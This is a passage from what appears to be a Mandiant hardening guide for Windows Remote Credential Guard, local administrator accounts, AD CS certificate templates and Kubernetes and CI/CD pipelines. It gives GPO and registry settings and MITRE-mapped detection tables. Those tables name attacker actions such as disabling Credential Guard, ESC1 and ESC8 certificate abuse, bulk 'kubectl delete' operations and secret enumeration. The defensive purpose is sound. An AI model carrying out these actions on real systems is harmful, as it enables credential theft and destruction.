<p role="presentation"><span>Must use Kerberos authentication to connect to the remote host</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The Remote Desktop Universal Windows Platform application does not support Windows Defender Remote Credential Guard.</span></p>
</li>
</ul>
<p><strong>Note:</strong><span> If the client cannot connect to a domain controller, then RDP attempts to fall back to NTLM. Windows Defender Remote Credential Guard does not allow NTLM fallback because this would expose credentials to risk.</span></p>
<p><span>The Remote Desktop remote (destination) host:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Must be running at least Windows 10 (v1607) or Windows Server 2016</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Must allow Restricted Admin connections</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Must allow the client's domain user to access Remote Desktop connections</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Must allow delegation of nonexportable credentials</span></p>
</li>
</ul>
<p><span>To enable Remote Credential Guard on the client (origination) host using a GPO configuration:</span></p>
<ul>
<li><em><span>Computer Configuration &gt; Administrative Templates &gt; System &gt; Credentials Delegation &gt; Restrict delegation of credentials to remote servers</span></em>
<ul>
<li><span>To require either Restricted Admin mode or Windows Defender Remote Credential Guard, choose <em>Prefer Windows Defender Remote Credential Guard</em>.</span>
<ul>
<li><span>In this configuration, Remote Credential Guard is preferred, but it will use <em>Restricted Admin mode</em> (if supported) when Remote Credential Guard cannot be used.</span></li>
<li><span>Neither Remote Credential Guard nor Restricted Admin mode for RDP will send credentials in clear text to the Remote Desktop server.</span></li>
</ul>
</li>
<li><span>To require Remote Credential Guard, choose <em>Require Windows Defender Remote Credential Guard</em>.</span>
<ul>
<li><span>In this configuration, a Remote Desktop connection will succeed only if the remote computer meets the requirements for Remote Credential Guard.</span></li>
</ul>
</li>
</ul>
</li>
</ul>
<p><span>To enable Remote Credential Guard on the remote (destination) host, see Figure 49.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa
Registry Entry: DisableRestrictedAdmin
Value: 0
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD</code></pre>
<p><span>Figure 49: Registry key and command options to enable Remote Credential Guard on a remote (destination) host</span></p></div>
<div class="block-paragraph_advanced"><p><span>To leverage Remote Credential Guard, use the command referenced in Figure 50.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mstsc.exe /remoteguard</code></pre>
<p><span>Figure 50: Command to leverage Remote Credential Guard</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for Windows Defender Remote Credential Guard</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Disable Remote Credential Guard</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1112/" rel="noopener" target="_blank"><span>T1112 – Modify Registry</span></a></p>
</td>
<td>
<p><span>Search for an account disabling Remote Credential Guard in the Windows Registry.<br><br></span></p>
<pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa

Registry Entry: DisableRestrictedAdmin

Value: 1</code></pre>
<p><span>Figure 51: Remote Credential Guard being disabled in the Windows Registry on a destination endpoint</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Disable Require Remote Credential Guard</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1484/001/" rel="noopener" target="_blank"><span>T1484.001 – Domain Policy Modification: Group Policy Modification</span></a></p>
</td>
<td>
<p><span>Search for the </span><span>Require Remote Credential Guard</span><span> option being disabled within a GPO configuration.<br> </span></p>
<pre class="language-plain"><code>Computer Configuration &gt; Administrative Templates &gt; System &gt; Credentials Delegation &gt; Restrict delegation of credentials to remote servers</code></pre>
<p><span>Figure 52: Remote Credential Guard being disabled in a GPO</span></p>
</td>
</tr>
</tbody>
</table></div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 28: Detection opportunities for Windows Defender Remote Credential Guard</span></div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Restrict Remote Usage of Local Accounts</span></h4>
<p><span>Local accounts that exist on endpoints are often a common avenue leveraged by threat actors to laterally move throughout an environment. This tactic is especially impactful when the password for the built-in local administrator account is configured to the same value across multiple endpoints.</span></p>
<p><span>To mitigate the impact of local accounts being leveraged for lateral movement, organizations should consider both limiting the ability of local administrator accounts to establish remote connections and creating unique and randomized passwords for local administrator accounts across the environment.</span></p>
<p><a href="https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a" rel="noopener" target="_blank"><span>KB2871997</span></a><span> introduced two well-known SIDs that can be leveraged within GPO settings to restrict the use of local accounts for lateral movement.</span></p>
<ul>
<li role="presentation"><code>S-1-5-113: NT AUTHORITY\Local account</code></li>
<li role="presentation"><code>S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code></li>
</ul>
<p><span>Specifically, the SID </span><code>S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span> is added to an account's access token if the local account is a member of the </span><code>BUILTIN\Administrators</code><span> group. </span><strong>This is the most beneficial SID to leverage to help stop a threat actor (or ransomware variant) that propagates using credentials for any local administrative accounts.</strong></p>
<p><strong>Note:</strong><span> </span><span>For SID </span><code>S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span>, if Failover Clustering is used, this feature should leverage a nonadministrative local account (</span><code>CLIUSR</code><span>) for cluster node management. </span><strong>If this account is a member of the local Administrators group on an endpoint that is part of a cluster, blocking the network logon permissions can cause cluster services to fail.</strong><span> Be cautious and thoroughly test this configuration on servers where Failover Clustering is used.</span></p>
<h4><span>Step 1 – Option 1: S-1-5-114 SID</span></h4>
<p><span>To mitigate the use of local administrative accounts from being used for lateral movement, use the </span><code>SID S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span> within the following settings:</span></p>
<ul>
<li><em><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></em>
<ul>
<li><span>Deny access to this computer from the network (<code>SeDenyNetworkLogonRight</code>)</span></li>
<li><span>Deny logon as a batch job (<code>SeDenyBatchLogonRight</code>)</span></li>
<li><span>Deny logon as a service (<code>SeDenyServiceLogonRight</code>)</span></li>
<li><span>Deny logon through Terminal Services (<code>SeDenyRemoteInteractiveLogonRight</code>)</span></li>
<li><span>Debug programs (<code>SeDebugPrivilege</code>: Permission used for attempted privilege escalation and process injection)</span></li>
</ul>
</li>
</ul>
<h4><span>Step 1 – Option 2: UAC Token-Filtering</span></h4>
<p><span>An additional control that can be enforced via GPO settings pertains to the usage of local accounts for remote administration and connectivity during a network logon. If the full scope of permissions (referenced previously) cannot be implemented in a short timeframe, consider applying the User Account Control (UAC) token-filtering method to local accounts for network-based logons. </span></p>
<p><span>To leverage this configuration via a GPO setting:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Download the Security Compliance Toolkit (</span><a href="https://www.microsoft.com/en-us/download/details.aspx?id=55319" rel="noopener" target="_blank"><span>https://www.microsoft.com/en-us/download/details.aspx?id=55319</span></a><span>) to use the MS Security Guide </span><code>ADMX</code><span> file. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Once downloaded, the </span><code>SecGuide.admx</code><span> and </span><code>SecGuide.adml</code><span> files must be copied to the </span><code>\Windows\PolicyDefinitions</code><span> and </span><code>\Windows\PolicyDefinitions\en-US directories</code><span> respectively.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>If a centralized GPO store is configured for the domain, copy the </span><code>PolicyDefinitions</code><span> folder to the </span><code>C:\Windows\SYSVOL\sysvol\&lt;domain&gt;\Policies</code><span> folder.</span></p>
</li>
</ol>
<h5><span>GPO Setting</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MS Security Guide &gt; Apply UAC restrictions to local accounts on network logons</span></p>
<ul>
<li aria-level="1"><span>Enabled</span></li>
</ul>
</li>
</ul>
<p><span>Once enabled, the registry value (Figure 53) will be configured on each endpoint.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy

REG_DWORD = "0" (Enabled)</code></pre>
<p><span>Figure 53: Registry key and value for enabling UAC restrictions for local accounts</span></p></div>
<div class="block-paragraph_advanced"><p><span>When set to </span><code>0</code><span>, remote connections with high-integrity access tokens are only possible using either the plain-text credential or password hash of the RID 500 local administrator (and only then depending on the setting of </span><code>FilterAdministratorToken</code><span>, which is configurable via the GPO setting of </span><span>User Account Control: Admin Approval Mode for the built-in Administrator account</span><span>).</span></p>
<p><span>The </span><code>FilterAdministratorToken</code><span> option can either enable (1) or disable (0) (default) </span><span>Admin Approval</span><span> mode for the RID 500 local administrator. When enabled, the access token for the RID 500 local administrator account is filtered and therefore UAC is enforced for this account (which can ultimately stop attempts to leverage this account for lateral movement across endpoints).</span></p>
<h5><span>GPO Setting</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options &gt; User Account Control: Admin Approval Mode for the built-in Administrator account</span></p>
</li>
</ul>
<p><span>Once enabled, the registry value (Figure 54) will be configured on each endpoint.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken

REG_DWORD = "1" (Enabled)</code></pre>
<p><span>Figure 54: Registry key and value for requiring Admin Approval Mode for local administrative accounts</span></p></div>
<div class="block-paragraph_advanced"><p><strong>Note:</strong><span> </span><span>It is also prudent to ensure that the default setting for </span><span>User Account Control: Run all administrators in Admin Approval Mode</span><span> (</span><code>EnableLUA</code><span> option) </span><strong>is not changed</strong><span> from </span><span>Enabled</span><span> (default, as shown in Figure 55) to </span><span>Disabled</span><span>. If this setting is disabled, </span><strong>all UAC policies are also disabled</strong><span>. With this setting disabled, it is possible to perform privileged remote authentication using plain-text credentials or password hashes with any local account that is a member of the local Administrators group.</span></p>
<h5><span>GPO Setting</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MS Security Guide &gt; User Account Control: Run all administrators in Admin Approval Mode</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Enabled</span></p>
</li>
</ul>
</li>
</ul>
<p><span>Once enabled, the registry value (Figure 55) will be configured on each endpoint. This is the default setting.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

REG_DWORD = "1" (Enabled)</code></pre>
<p><span>Figure 55: Registry key and value for requiring Admin Approval Mode for all local administrative accounts</span></p></div>
<div class="block-paragraph_advanced"><p><strong>UAC access token filtering will not affect any domain accounts in the local Administrators group on an endpoint.</strong></p>
<h4><span>Step 2: LAPS</span></h4>
<p><span>In addition to blocking the use of local administrator accounts from remote authentication to access endpoints, an organization should align a strategy to enforce password randomization for the built-in local administrator account. For many organizations, the easiest way to accomplish this task is by deploying and leveraging Microsoft's Local Administrator Password Solutions (LAPS).</span></p>
<p><span>Additional information regarding <a href="https://www.microsoft.com/en-us/download/details.aspx?id=46899" rel="noopener" target="_blank">LAPS</a>, and <a href="https://learn.microsoft.com/en-us/entra/identity/devices/howto-manage-local-admin-passwords" target="_blank">here too</a>.</span></p>
<h4><span>Detection Opportunities for Local Accounts</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Attempted Remote Logon of Local Account</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/003/" rel="noopener" target="_blank"><span>T1078.003 - Valid Accounts: Local Accounts</span></a></p>
</td>
<td>
<p><span>Search for remote logon attempts for local accounts on an endpoint.</span></p>
</td>
</tr>
</tbody>
</table></div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 29: Detection opportunities for local accounts</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Active Directory Certificate Services (AD CS) Protections</span></h4>
<p><span>Active Directory Certificate Services (AD CS) is Microsoft's implementation of Public Key Infrastructure (PKI) and integrates directly with Active Directory forests and domains. It can be utilized for a variety of purposes, including digital signatures and user authentication. Certificate Templates are used in AD CS to issue certificates that have been preconfigured for particular tasks. They contain settings and rules that are applied to incoming certificate requests and provide instructions on how a valid certificate request is provided.</span></p>
<p><span>In June of 2021, SpecterOps published a blog post named </span><a href="https://specterops.io/blog/2021/06/17/certified-pre-owned/" rel="noopener" target="_blank"><span>Certified Pre-Owned</span></a><span>, which details their research into possible attacks against AD CS. Since that publication, Mandiant has continued to observe both threat actors and red teamers enhance targeting of AD CS in support of post-compromise objectives. Mandiant's </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defend-ad-cs-threats/"><span>blog post</span></a> <span>and </span><a href="https://services.google.com/fh/files/misc/active-directory-certificate-services-hardening-wp-en.pdf" rel="noopener" target="_blank"><span>hardening guide</span></a><span> address the continued abuse scenarios and AD CS attack vectors identified through our frontline observations of recent security breaches.</span></p>
<h4><span>Discover Vulnerable Certificate Templates</span></h4>
<p><span>Certificate templates that have been configured and published by AD CS are stored in Active Directory as objects with an object class of </span><code>pKICertificateTemplate</code><span> and can be discovered by blue teams as well as threat actors. Any account that is authenticated to Active Directory can query LDAP directly, with the built-in Windows command </span><code>certutil.exe</code><span>, or with specialized tools such as </span><a href="https://github.com/GhostPack/PSPKIAudit" rel="noopener" target="_blank"><span>PSPKIAudit</span></a><span>, </span><a href="https://github.com/ly4k/Certipy" rel="noopener" target="_blank"><span>Certipy</span></a><span>, and </span><a href="https://github.com/GhostPack/Certify" rel="noopener" target="_blank"><span>Certify</span></a><span>. Mandiant recommends using one of these methods to discover vulnerable certificate templates.</span></p>
<h4><span>Harden Vulnerable Certificate Templates</span></h4>
<p><span>Once discovered, vulnerable certificate templates should be hardened to prevent abuse.</span></p></div>
<div class="block-paragraph_advanced"><ol>
<li aria-level="1">
<p role="presentation"><span>Ensure that all domain controllers and Certificate Authority servers are patched with the latest updates and hotfixes.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>After installing Windows update (</span><a href="https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16" rel="noopener" target="_blank"><span>KB5014754</span></a><span>) and monitoring/remediating for Event IDs 39 and 41, configure Active Directory to support full enforcement mode to reject authentications based on weaker mappings in certificates.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Using one of the aforementioned methods, regularly review published certificate templates, specifically for any settings related to SAN specifications configured in existing templates.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Review the security permissions assigned to all published certificate templates and validate the scope of enrollment and write permissions are delegated to the correct security principals.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Review published templates configured with the following Enhanced Key Usages (EKUs) that support domain authentication and verify the operational requirement for these configurations.</span></p>
</li>
</ol><ul>
<li aria-level="2">
<p role="presentation"><span>Any Purpose (2.5.29.37.0)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Subordinate CA (None)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Client Authentication (1.3.6.1.5.5.7.3.2)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>PKINIT Client Authentication (1.3.6.1.5.2.3.4)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Smart Card Logon (1.3.6.1.4.1.311.20.2.2)</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>For templates with sensitive Enhanced Key Usage (EKU), limit enrollment permissions to predefined users or groups, as certificates with EKUs can be used for multiple purposes. Access control lists for templates should be audited to ensure that they align with the principle of least privilege.</span><span>Templates that allow for domain authentication should be carefully reviewed to verify that built-in groups that contain a large scope of accounts are not assigned enrollment permissions. Example: built-in groups that could increase the risk for abuse include:</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Everyone</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>NT AUTHORITY\Authenticated Users</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Domain Users</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Domain Computers</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Where possible, enforce "CA Certificate Manager approval" for any templates that include a SAN as an issuance requirement. This will require that any certificate issuance requests be manually reviewed and approved by an identity assigned the "Issue and Manage Certificates" permission on a certificate authority server.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ensure that Certificate Authorities have not been configured to accept any SAN (irrelevant of the template configuration). This is a non-default configuration and should be avoided wherever possible. This abuse vector is mitigated by KB5014754, but until enforcement of strong mappings is enforced, abuse could still occur based upon historical certificates missing the new OID containing the requester's SID. For additional information, reference the following </span><a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786426(v=ws.11)#controlling-user-added-subject-alternative-names" rel="noopener" target="_blank"><span>Microsoft article</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Treat both root and subordinate certificate authorities as Tier 0 assets and enforce logon restrictions or authentication policy silos to limit the scope of accounts that have elevated access to the servers where certificate services are installed and configured.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Audit and review the NTAuthCertificates container in AD to validate the referenced CA certificates, as this container references CA certificates that enable authentication within AD. Before authenticating a principal, AD checks the NTAuthCertificates container for the CA specified in the authenticating certificate's Issuer field to validate the authenticity of the CA. If rogue or unauthorized CA certificates are present, this could be indicative of a security event that requires further triage and investigation.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>To avoid the theft of a CA's private keys (e.g., via the DPAPI backup protocol), protect the private keys by leveraging a Hardware Security Module (HSM) on servers where certificate authority services are installed and configured.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Enforce multifactor authentication (MFA) for CA and AD management and operations.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Keep the root CA offline and use subordinate CAs to issue certificates.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Regularly validate and identify potential misconfigurations within existing certificate templates using the built-in Windows command </span><code>certutil.exe</code><span>, or with specialized tools such as </span><a href="https://github.com/GhostPack/PSPKIAudit" rel="noopener" target="_blank"><span>PSPKIAudit</span></a><span>, </span><a href="https://github.com/ly4k/Certipy" rel="noopener" target="_blank"><span>Certipy</span></a><span>, and </span><a href="https://github.com/GhostPack/Certify" rel="noopener" target="_blank"><span>Certify</span></a><span>. Public tools (e.g., PSPKIAudit, Certipy, or Certify) may be flagged by EDR products as they are frequently used by red teams and threat actors.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>To mitigate NTLM Relay attacks in AD CS, enable Extended Protection For Authentication for Certificate Authority Web Enrollment and Certificate Enrollment Web Service. Additionally, require that AD CS accept only HTTPS connections. For additional details, reference the following </span><a href="https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429" rel="noopener" target="_blank"><span>Microsoft Article</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Enable audit logging for Certificate Services on CA servers and Kerberos Authentication Service on Domain Controllers by using group policy. Ensure that event IDs 4886 and 4887 from CA servers and 4768 from domain controllers are aggregated in the organization's SIEM solution.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Enable the audit filter on each CA server. This is a bitmask value that represents the seven different audit categories that can be enabled; if all values are enabled, the audit filter will have a value of 127.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Log and monitor events from the CA servers and domain controllers to enhance detections related to AD CS activities (steps 16 and 17 are needed to ensure the appropriate logs are generated).</span></p>
</li>
</div>
<div class="block-paragraph_advanced"><h4><span>Detection Opportunities for AD CS Abuse</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Certificate Request with Mismatched SAN (ESC1)</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1649/" rel="noopener" target="_blank"><span>T1649 - Steal or Forge Authentication Certificates</span></a></p>
</td>
<td>
<p><span>Monitor event IDs 4886 (certificate request received) and 4887 (certificate issued) on CA servers. Alert when the requesting account's identity differs from the Subject Alternative Name (SAN) specified in the certificate.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>NTLM Relay to AD CS Web Enrollment (ESC8)</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1557/001/" rel="noopener" target="_blank"><span>T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1649/" rel="noopener" target="_blank"><span>T1649 - Steal or Forge Authentication Certificates</span></a></p>
</td>
<td>
<p><span>Monitor for NTLM authentication to AD CS HTTP enrollment endpoints from domain controllers or privileged servers. Correlate with PetitPotam coercion indicators. This attack chain provides a direct path from any domain user to Domain Admin.</span></p>
</td>
</tr>
</tbody>
</table></div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 30: Detection opportunities for AD CS abuse</span></div></div>
<div class="block-paragraph_advanced"><h3><span>5. Preventing Destructive Actions in Kubernetes and CI/CD Pipelines</span></h3>
<p><span>Organizations should implement a proactive, defense-in-depth technical hardening strategy to systematically address foundational security gaps and mitigate the risk of destructive actions across their Kubernetes environments and Continuous Integration/Continuous Delivery or Deployment (CI/CD) pipelines. Adversaries increasingly target the CI/CD pipeline and the Kubernetes control plane because they serve as centralized hubs with direct access to application deployments and underlying infrastructure.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Source and Build Compromise:</strong><span> Threat actors target code repositories (e.g., GitHub, GitLab, Azure DevOps) and build environments to steal injected environment variables and secrets. Attackers can then commit malicious workflow files designed to exfiltrate repository data or deploy unauthorized infrastructure.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Container Registry Poisoning: </strong><span>By compromising developer credentials or CI/CD pipeline permissions, attackers overwrite legitimate application images in the container registry. When the Kubernetes cluster pulls the updated image, it unknowingly deploys a poisoned container embedded with backdoors, ransomware, or destructive data-wiping logic.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Cluster-Level Destruction:</strong><span> Once an attacker gains a foothold inside the Kubernetes cluster, they often abuse over-permissive role-based access control (RBAC) configurations. This provides the capability to execute destructive commands using application programming interfaces (APIs) (e.g., kubectl delete deployments), wipe persistent volumes, or delete critical namespaces, effectively causing a loss of availability and application denial of service.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Secrets Extraction and Lateral Movement: </strong><span>Attackers routinely execute Kubernetes-specific attack tools to harvest secrets from compromised Kubernetes pods. These secrets often contain database passwords and cloud identity and access management (IAM) keys, allowing the attacker to pivot out of the cluster and impact cloud-based resources.</span></p>
</li>
</ul>
<p><span>Additional information related to <a href="https://owasp.org/www-project-top-10-ci-cd-security-risks/" rel="noopener" target="_blank">securing CI/CD</a>.</span></p>
<h4><span>Hardening and Mitigation Guidance</span></h4>
<p><span>To defend against CI/CD compromises and destructive actions within Kubernetes, organizations must enforce strict identity boundaries, cryptographic trust, and a least-privilege architecture.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Isolate the Kubernetes Control Plane:</strong><span> Disable unrestricted and public internet access to the Kubernetes API server. For managed services like GKE, EKS, and AKS, ensure the control plane is configured as a private endpoint or heavily restricted via authorized network IP allow-listing. Access to the API should only be permitted from trusted, designated internal management subnets or secure corporate VPNs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Secure Management Interfaces and CI/CD Pipelines:</strong><span> Enforce mandatory MFA for all access to infrastructure management platforms, including source code repositories such as GitLab/GitHub, and container registries. Utilize hardened container images (e.g., Chainguard containers, Docker Hardened Images) as base images. Implement software supply chain security frameworks (like </span><a href="https://openssf.org/projects/slsa/" rel="noopener" target="_blank"><span>SLSA</span></a><span>) by requiring image signing, provenance generation, and admission controllers (such as Binary Authorization). This ensures that the Kubernetes cluster will definitively reject and block any unverified or poisoned container images from running.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Enforce Strict RBAC and Least Privilege:</strong><span> To limit the "blast radius" of a compromised pod, restrict the use of the cluster-admin role and strictly prohibit wildcard (*) permissions for standard service accounts. Workloads must run under strict security contexts—blocking containers from executing as root, preventing privilege escalation, and restricting access to the underlying worker node (e.g., disabling hostPID and hostNetwork).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Implement Immutable Cluster Backups: </strong><span>Protect the cluster's state (etcd) and stateful workload data (Persistent Volumes) by utilizing immutable backup repositories. This ensures that even if an attacker gains administrative access to the cluster or CI/CD pipeline and attempts to maliciously delete all resources, the backups cannot be destroyed or altered.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Enable Audit Logging and Threat Detection: </strong><span>Ensure Kubernetes Control Plane audit logs, node-level telemetry, and CI/CD pipeline logs are actively forwarded to a centralized SIEM. Deploy dedicated container threat detection capabilities to immediately alert on malicious exec commands, suspicious Kubernetes enumeration tools, or bulk data deletion attempts within the pods.</span></p>
</li>
</ul>
<p><span>Additional information related to <a href="https://owasp.org/www-project-kubernetes-top-ten/" rel="noopener" target="_blank">securing Kubernetes</a>.</span></p>
<h4><span>Detection Opportunities for Kubernetes and CI/CD</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Bulk Kubernetes Resource Deletion</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1485/" rel="noopener" target="_blank"><span>T1485 - Data Destruction</span></a></p>
</td>
<td>
<p><span>Monitor Kubernetes API audit logs for bulk delete operations targeting Deployments, StatefulSets, Persistent Volume Claims, Namespaces, or ConfigMaps.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Unsigned or Modified Container Image Deployed to Cluster</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1525/" rel="noopener" target="_blank"><span>T1525 - Implant Internal Image</span></a></p>
</td>
<td>
<p><span>Monitor container registries and Kubernetes admission events for deployment of images that fail signature verification, lack provenance attestation, or originate from untrusted registries.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Anomalous Kubernetes Secret Access</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1552/007/" rel="noopener" target="_blank"><span>T1552.007 - Unsecured Credentials: Container API</span></a></p>
</td>
<td>
<p><span>Monitor Kubernetes audit logs for API calls to </span><span>/api/v1/secrets</span><span> or </span><span>/api/v1/namespaces/*/secrets</span><span> from service accounts or users that do not normally access secrets. </span></p>
<p><span>Alert on bulk secret enumeration and on access to secrets in sensitive namespaces.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Unauthorized Modification to CI/CD Pipeline Configuration</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1195/002/" rel="noopener" target="_blank"><span>T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain</span></a></p>
</td>
<td>
<p><span>Monitor source code repositories for modifications to CI/CD pipeline configuration files. </span></p>
<p><span>Alert on changes to pipeline definitions made by accounts that are not members of designated pipeline-owner groups, or changes pushed code outside of an approved pull request/merge request workflow.</span></p>
</td>
</tr>
<tr>
<td>
